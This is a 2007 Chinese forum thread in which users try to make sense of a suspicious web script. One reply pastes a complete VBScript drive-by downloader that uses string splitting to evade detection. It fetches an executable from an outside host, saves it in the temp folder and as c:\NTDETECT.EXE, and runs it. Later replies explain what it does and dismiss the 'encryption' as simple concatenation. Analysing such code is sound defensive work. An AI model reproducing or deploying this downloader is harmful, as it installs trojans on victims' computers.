找回密码
 注册
快捷导航
查看: 566|回复: 8

那位给翻译下这两段代码

 关闭 [复制链接] |自动提醒
阅读字号:

6265

回帖

0

积分

424

资产值

入门会员 Rank: 1

注册时间
2007-3-8
发表于 2007-8-9 15:09:28| 字数 51| - 中国–广东–深圳 电信 | 显示全部楼层 |阅读模式
如题,不是很明白,给翻译下。
网页木马

[ 本帖最后由 coolnight9 于 2007-8-9 15:57 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
 小红拖拉机,喷气又喷烟
           屁股决定脑袋

1884

回帖

39

积分

1316

资产值

钻石会员 Rank: 3Rank: 3Rank: 3

注册时间
2007-3-26
发表于 2007-8-9 15:12:31| 字数 16| - 中国–北京–北京 鹏博士BGP | 显示全部楼层
不懂js帮顶。貌似md5加密算法
不再回归
回复 支持 反对

使用道具 举报

jext - X62-1051

1661

回帖

100

积分

6415

资产值

至尊会员I Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2006-5-5
铜牌荣誉勋章(注册8年以上会员)
发表于 2007-8-9 15:48:03| 字数 1,807| - 中国–广东–深圳 电信 | 显示全部楼层
FK ,这看来像一段网页病毒

---------------------------
Microsoft Internet Explorer
---------------------------
<script language=VBScript>

                On Error Resume Next

                vip1= "e"

                vip2= "x"

                vip3= "e"

                vip = "http://www.vokx.cn/voo/vip."

                Set ou = document.createElement("object")

                ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":uso="Microsoft.X":pk="MLHTTp"

                ou.SetAttribute "classid", ccc&lll&sss&iii&ddd

                bnb=uso&pk

                Set vips = ou.CreateObject(bnb,"")

                vips.Open "GET", vip&vip1&vip2&vip3, False

                vips.Send

                Hi="microsofts.bat"

                love="microsofts.vbs"

                SS="Scripting."

                cc="FileSyst"

                rr="emObject"

                Set Ho = ou.createobject(SS&cc&rr,"")

                Set uxo = Ho.GetSpecialFolder(2)

                Hi=Ho.BuildPath(uxo,Hi)

                love=Ho.BuildPath(uxo,love)

                RR="Adod"

                NN="b.stream"

                hpk=RR&NN

                Set chenzi = ou.createobject(hpk,"")

                chenzi.type=1

                chenzi.Open

                chenzi.Write vips.ResponseBody

                chenzi.Savetofile Hi,2

                chenzi.Close

                chenzi.Type=2

                chenzi.Open

                chenzi.WriteText  "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"shell.run ("""&Hi&""")"&vbCrLf&"Set Shell = Nothing"

                chenzi.Savetofile love,2

                chenzi.Savetofile "c:\\NTDETECT.EXE",2

                chenzi.Close

                we="Shell.Applica"

                Set Run = ou.createobject(we&"tion","")

                kkk="Op"

                lll="en"

                Run.Shellexecute love,"","",kkk&lll,0

                </script>



<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>FFF
---------------------------
确定   
---------------------------
rMBP ME665 i7-3840QM/768G/16G
X220 i7/256G M4 + 512G 840Pro/16G
回复 支持 反对

使用道具 举报

6265

回帖

0

积分

424

资产值

入门会员 Rank: 1

注册时间
2007-3-8
 楼主| 发表于 2007-8-9 15:56:13| 字数 27| - 中国–广东–深圳 电信 | 显示全部楼层
忘了说了,应该是段病毒的代码,奇怪我nod没报警。。。
 小红拖拉机,喷气又喷烟
           屁股决定脑袋
回复 支持 反对

使用道具 举报

581

回帖

11

积分

1882

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2005-11-25
银牌荣誉勋章(注册10年以上会员)
发表于 2007-8-9 16:10:37| 字数 39| - 美国–华盛顿州–金–雷德蒙德 Microsoft | 显示全部楼层
恶意脚本,下载木马文件,并伪装成c盘的NTDETECT.EXE文件。。。。。。
回复 支持 反对

使用道具 举报

581

回帖

11

积分

1882

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2005-11-25
银牌荣誉勋章(注册10年以上会员)
发表于 2007-8-9 16:15:43| 字数 93| - 美国–华盛顿州–金–雷德蒙德 Microsoft | 显示全部楼层
不过Win系统下没有NTDETECT.EXE文件,只有NTDETECT.com文件,而默认系统是不显示后缀的,所以就看到两个NTDETECT。。。。。。。。


很老的一个木马了。。。。。。。
回复 支持 反对

使用道具 举报

6265

回帖

0

积分

424

资产值

入门会员 Rank: 1

注册时间
2007-3-8
 楼主| 发表于 2007-8-9 16:21:12| 字数 18| - 中国–广东–深圳 电信 | 显示全部楼层
代码的加密算法是怎么样的,给大致讲讲
 小红拖拉机,喷气又喷烟
           屁股决定脑袋
回复 支持 反对

使用道具 举报

581

回帖

11

积分

1882

资产值

黄金会员 Rank: 3Rank: 3Rank: 3

注册时间
2005-11-25
银牌荣誉勋章(注册10年以上会员)
发表于 2007-8-9 16:26:48| 字数 57| - 美国–华盛顿州–金–雷德蒙德 Microsoft | 显示全部楼层
哪里有加密了?把exe拆开写成e,x,e,然后再连起来,其他的类似,没有什么加密。。。。这是VBS,不是JS。。。
回复 支持 反对

使用道具 举报

6265

回帖

0

积分

424

资产值

入门会员 Rank: 1

注册时间
2007-3-8
 楼主| 发表于 2007-8-9 16:51:51| 字数 15| - 中国–广东–深圳 电信 | 显示全部楼层

回复 #8 lotuis 的帖子

我说的是我发的那两个txt文件
 小红拖拉机,喷气又喷烟
           屁股决定脑袋
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Powered by Discuz! X3.5 © 2001-2023 Comsenz Inc

GMT+8, 2025-11-4 20:27 , Processed in 0.094440 second(s), 36 queries , Gzip On, OPcache On.

手机版|小黑屋|安卓客户端|iOS客户端|Archiver|备用网址1|备用网址2|在线留言|专门网

返回顶部